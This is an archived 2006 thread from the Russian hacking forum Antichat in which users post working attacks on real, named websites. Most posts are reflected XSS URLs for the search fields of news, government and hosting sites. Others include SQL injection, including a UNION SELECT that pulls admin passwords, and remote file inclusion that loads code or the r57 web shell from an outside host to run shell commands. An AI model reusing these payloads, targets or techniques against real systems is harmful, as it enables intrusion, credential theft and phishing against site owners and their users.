Форум АНТИЧАТ

Форум АНТИЧАТ (https://forum.antichat.xyz/index.php)
-   Уязвимости (https://forum.antichat.xyz/forumdisplay.php?f=74)
-   -   Баги на сайтах. (https://forum.antichat.xyz/showthread.php?t=13624)

D1mOn 28.01.2006 18:04

Баги на сайтах.
 
Очень часто создаются темы типа: Нашел XSS, Нашёл SQL injection. Уже немного надоело. Предлагаю всем найденные вами баги (если вам не терпится показать этот баг всем) постить в эту тему, чтобы не засорять форум!

UPD: никаких рефереров! все линки даем исключительно так _http://

D1mOn 28.01.2006 18:12

http://www.generis.ru/?page=press_wholenews&id='
http://www.integracija.gov.lv/forum/?setc=1&forumid='
http://www.mossei.ru/?page='
Вот для начала

Vandal 28.01.2006 18:13

Идея хорошая принципы .

_www.pansionmsu.ru , в строке поиска <script>alert()<script>
_http://msu.ru/ , в строке поиска , <script>alert()<script> не вышел , а <marquee>msu</marquee> выходит .

_http://online.ua/ Строка поиска , <marquee>UA</marquee> , <img src="http://www.online.ua/all/0.gif"> покажет свой собственный логотип который в верхнем левом углу .

Vandal 29.01.2006 00:44

_http://referat.star-info.ru

В поиске если написать <i>i</i> то будет так

Warning: eregi_replace(): REG_EMPTY in /usr/home/www/user/referat.star-info.ru/inc/func on line 73

Shurik 15.02.2006 00:06

www.supersait.net.ru/billing/config.php?_CCFG[_PKG_PATH_DBSE]=http://qwe20063.narod.ru/&cmd=id
сам сайт supersait.net.ru нечего из себя не представляет, зато он хостится на очень известном хостинге, до которого можно добраться используя багу в phpcoin.
Тоесть благодаря php include мы можем выполнять никсовые комманды (ls;pwd;echo;cat) на сервере.

Vandal 01.03.2006 01:21

_http://vidahl.agava.ru/cgi-bin/dic.cgi?search=%3Ci%3Ei%3C%2Fi%3E&method=exact




В графе поиск статьи <script>alert()</script>

Vandal 01.03.2006 19:35

Справочник телефонов города Орла

http://www.g-play.ru/orel/

"Поиск организаций по названию, виду деятельности:"

В поиске <script>alert()</script>

Vandal 01.03.2006 19:56

Еще .

1)


url : _http://prohosting.fatpickle.com/search

<script>alert()</script> в поиске .


2)



Url: _http://www.babr.ru/index.php?pt=pages


<script>alert()</script> в поиске .

3)

url : _http://www.ambercity.ru/


<script>alert()</script> в поиске .

Vandal 02.03.2006 01:38

1)


Url :_http://www.cityvision2000.com

Можно узнать путь установки .

В поиске <script>alert()</script>

"D:\Webs\city\www\search.cgi": No such file or directory

2)

url: _http://www.pages.ru/

Поиск <script>alert()</script>

tclover 03.03.2006 19:25

_http://zna.nu/vg_eng.php?id='
Интересный сайт :)

Vandal 03.03.2006 19:30

Url : _http://xss.mask.ru/

В поиске <script>alert()</script>

Vandal 05.03.2006 03:03

Url : _http://www.miit.net

<script>alert()</script> В поиске

Gang100 07.03.2006 19:45

XSS-уязвимости

1. _http://www.ruslink.de/cgi-bin/search.pl XSS1 - "<script>alert()</script>" в строчке поиска.

2. _http://links.keraben.ru/search.php XSS2 - "<script>alert()</script>" в строчке поиска.

3. _http://www.send.ru/search/index.html XSS3 - "<script>alert()</script>" в строчке поиска.

4. _http://coda.net.ru/index.php XSS4 - "<script>alert()</script>" в строчке поиска.

5. _http://www.zlinks.ru/search.php XSS5 - "<script>alert()</script>" в строчке поиска.

•••™NO FEAR™••• 07.03.2006 19:56

Цитата:

XSS-уязвимости

1. _http://www.ruslink.de/cgi-bin/search.pl XSS1 - "<script>alert()</script>" в строчке поиска.

2. _http://links.keraben.ru/search.php XSS2 - "<script>alert()</script>" в строчке поиска.

3. _http://www.send.ru/search/index.html XSS3 - "<script>alert()</script>" в строчке поиска.

4. _http://coda.net.ru/index.php XSS4 - "<script>alert()</script>" в строчке поиска.

5. _http://www.zlinks.ru/search.php XSS5 - "<script>alert()</script>" в строчке поиска.
И толку от них? Это пасивные XSS.

max_pain89 07.03.2006 23:18

http://icq.rambler.ru/popup.html?ipath=<script>alert()</script>

=) Люблю Аську.

Nexwill 07.03.2006 23:19

_http://www.nne.ru/news.php?id=1429'<script>alert(/nexwill/)</script> Гы ))))) :D :D

Vandal 07.03.2006 23:22

На __http://www.nne.ru Xss еще в поиске .

Vandal 08.03.2006 23:08

_http://www.flirtshop.ru/search.xhtml?sea_text=%3Cscript%3Ealert%28%22Vanda l%22%29%3C%2Fscript%3E&-action.search=1

seeattact 11.03.2006 00:33

http://dimon.kanet.ru/members.php?so...ichat.ru%20%3C

Gang100 11.03.2006 23:05

xss..

1. _http://www.infopiter.ru/cgi-bin/catalog/catalog.cgi?action=search&fil=1&Keywords=%3Cscript %3Ealert%28%29%3C%2Fscript%3E&poisk=word
2. _http://list.emy.ru/search.php?keyword=%3Cscript%3Ealert%28%29%3C%2Fsc ript%3E&opt=0&x=26&y=9
3. _http://www.fromatoz.ru/catalog/search/?searchQuery=%3Cscript%3Ealert%28%29%3C%2Fscript%3 E
4. _http://links.vestor-ru.ru/0.html?s=%3Cscript%3Ealert%28%29%3C%2Fscript%3E
5. _http://catalog.a-les.ru/index.php?ac=search / в поиске <script>alert()</script>

Vandal 11.03.2006 23:22

_http://avtoprice.com/cgi-bin/search.pl

Поиск : <script>alert()</script>

_http://www.autobriz.ru/cgi-bin/catalog-find.pl?CMD=FIND&WORDS=%3Cscript%3Ealert%28%29%3C% 2Fscript%3E

Utochka 11.03.2006 23:50

Вот ловите

http://www.hithost.ru/cgi-bin/game_1_10.cgi?sid=5668431270%22%3E%3Cscript%3Ealer t(document.cookie)%3C/script%3E%3Cb%20src=%22

может тому кто сайт расскручивает и пригодиться, d1mon - это тебе )) ггг..

Gang100 13.03.2006 16:41

XSS

Поисковая система KM.RU
_http://go.km.ru/index.asp?idr=0&ids=&wdv=0&mrv=1&dti=0&dtv=3&idt=& ann=1&srt=0&itp=-1&osq=&P1=&P2=&P3=&ext=0&opt=0&hlp=0&sr=0&sq=%3Csc ript%3Ealert%28%29%3C%2Fscript%3E

РИА Новости
_http://www.rian.ru/search/?query=%22%3Esa%3Cscript%3Ealert%28%29%3C%2Fscript %3E&x=8&y=1

Lenta.ru
_lenta.ru в поиске: "><script>alert ()</script>

ГАЗПРОМ.ру
_http://www.gazprom.ru/cgi-bin/htsearch - в поиске: "><script>alert ()</script>

Болеро.ру
_http://www.bolero.ru в поиске: "><script>alert ()</script>

CyberFight.ru
_http://cyberfight.ru/info/search/?qry=%22%3E%3Cscript%3Ealert%28%29%3C%2Fscript%3E& mode=simple

kino.ru
_http://www.kino.ru/search.php - в поиске: <script>alert ()</script>

РБК
_http://av.rbc.ru/?query=%3Cscript%3Ealert%28%29%3C%2Fscript%3E&type =&morph=on&cat=&d1=13&m1=02&y1=2006&d2=13&m2=03&y2 =2006&howmany=10&sort=date

Gang100 14.03.2006 16:10

XSS

Сайт Правительства России (government.ru)
_http://www.government.ru - в поиске: "><script>alert ()</script>

Rambler: Фото
_http://foto.rambler.ru - в поиске: "><script>alert ()</script>

Правда.ру
_http://pravda.ru - в поиске: "><script>alert ()</script>

Referat.com
_http://links.referat.com/?hp=0&st=%3Cscript%3Ealert+%28%29%3C%2Fscript%3E

RuPay.ru
_http://rupay.ru - /подписка на новости/ - /ваш email/ - вписываем туда: "><script>alert ()</script>

Ren-TV.com
_http://ren-tv.com - /поиск/ - "><script>alert ()</script>

VolkIncor 16.03.2006 17:34

VolkIncor
 
1)http://www.strelna.org.ru/main.php?p...u/r57shell.txt

2)http://sync.te.ua/index.php?page=htt...u/r57shell.txt
:eek: :eek: :eek: :confused: :confused: :confused:

VolkIncor 17.03.2006 16:58

http://npunlimited.np.funpic.de/4images/register.php

Lovi ewe odin!!

Vandal 17.03.2006 19:06

_http://kinoshara.com/search.php?search=%3Cscript%3Ealert%28%29%3C%2Fscr ipt%3E

CinerX 18.03.2006 19:45

h16.ru
http://register.h16.ru/cgi-bin/sp.cgi?fqdn=%3Cscript%3Ealert()%3C/script%3E

Gang100 18.03.2006 20:42

XSS
прошелся по хостингам


Netco
_http://www.netco.ru - Зарегистрировать домен -> <script>alert ()</script>

Standarthost
_http://www.standarthost.ru - Проверка домена -> <script>alert ()</script>

[.m]masterhost
_http://masterhost.ru - Проверить домен -> "><script>alert ()</script>

Terrahost
_http://www.terrahost.ru/whois/whois.php?domain=%22%3E%3Cscript%3Ealert+%28%29%3C %2Fscript%3E&ru=on

MASTAK
_http://www.mastak.ru/Mwois/mwhois.php?domain=<script>alert%20()</script>

CinerX 20.03.2006 03:30

h16.ru
http://s.agava.ru/cgi/g.cgi?p=150&u=mail.ru
http://www.agava.ru/cgi/g.cgi?p=134&...://www.mail.ru

KEZ 20.03.2006 03:37

Уже посерьезнее, эту можно использовать для фишинга...
Как и предыдущую... Остальные бесполезны практически...

Vandal 28.03.2006 23:17

_http://kaiser.su/index.html?form='



_http://saratov.cityout.ru/search/?fastsearch=%3Cscript%3Ealert%28%29%3C%2Fscript%3E &cat=0


Links

Vandal 31.03.2006 20:56

http://www.rrecord.ru/search.html?cat=0&keys=%3Cscript%3Ealert%28%27XSS% 27%29%3C/scri

Azazel 31.03.2006 22:25

Цитата:

_http://kaiser.su/index.html?form='
Код:

http://kaiser.su/index.html?form=index&href=223344&class=-5%20union%20select%201,concat(name,':',password),3,4,5,6,7,8,9,10,11%20from%20admin/*

Nexwill 31.03.2006 22:49

_http://mail.goon.ru/reg/agreement.phtml?r1=103'&t1=%5C%22%5C%272&i=

Nexwill 31.03.2006 22:50

http://wahack.org.ru/?sec=lib&ver=html&p=0&text=2'

max_pain89 31.03.2006 23:06

http://www.gamershell.com/pc/gti_racing/screenshots.html?id=<script>alert()</script>

vectorg 31.03.2006 23:16

31.03.2006 20:11
Цитата:

Интернет-холдинг Рамблер начинает тестирование поиска изображений в Сети. Бета-версия нового поискового сервиса Рамблера подбирает по ключевым словам рисунки, фотографии и любые другие графические файлы, которые хранит Всемирная Паутина.
хорошее начало - http://www.rambler.ru/cgi-bin/pic.cgi?words="><script>alert(/VectorG/)</script>

vectorg 01.04.2006 01:27

багу нашёл около 3х недель назад

говорили с киборгом в мирке на счёт этого дела, итог: бага ниче не даёт... но всё равно интересная реализация:

http://afisha.yandex.ru/event.xml%00
http://money.yandex.ru/shops.xml%00

и так во многих xml яндекса, но не во всех...

podkashey 02.04.2006 14:59

На http://ha.ckers.org/xss.html если ввести в поле:
HTML (with semicolons):
текст
%Wd
то выскакивает алерт, правда не понял почему и какая от этого польза.


Время: 04:46